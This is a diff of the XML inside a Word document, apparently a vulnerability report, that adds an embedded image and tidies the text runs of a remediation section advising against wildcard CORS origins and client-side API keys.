+            </wp:positionV>
+            <wp:extent cx="6645910" cy="2098675"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:wrapTopAndBottom/>
+            <wp:docPr id="1187390886" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1187390886" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6645910" cy="2098675"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
         <w:t>REMEDIATION</w:t>
       </w:r>
     </w:p>
@@ -825,15 +1039,7 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>The root cause of the vulnerability is the application's permissive CORS configuration. The application should never trust all origins. Update the Access-Control-Allow-Origin header to only allow trusted domains, rather than using a wildcard (*).</w:t>
+        <w:t xml:space="preserve"> The root cause of the vulnerability is the application's permissive CORS configuration. The application should never trust all origins. Update the Access-Control-Allow-Origin header to only allow trusted domains, rather than using a wildcard (*).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -865,15 +1071,7 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>If you absolutely have to use wildcards in CORS (e.g., for public API endpoints), ensure you don't support credentials (cookies, HTTP authentication, client-side SSL certificates). Set Access-Control-Allow-Credentials to false.</w:t>
+        <w:t xml:space="preserve"> If you absolutely have to use wildcards in CORS (e.g., for public API endpoints), ensure you don't support credentials (cookies, HTTP authentication, client-side SSL certificates). Set Access-Control-Allow-Credentials to false.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -905,15 +1103,7 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>API keys should not be exposed directly in the client side. Rather than making calls directly from the client side that exposes API keys, consider making those calls from the server side. Use server-side sessions or another method to handle sensitive operations.</w:t>
+        <w:t xml:space="preserve"> API keys should not be exposed directly in the client side. Rather than making calls directly from the client side that exposes API keys, consider making those calls from the server side. Use server-side sessions or another method to handle sensitive operations.</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
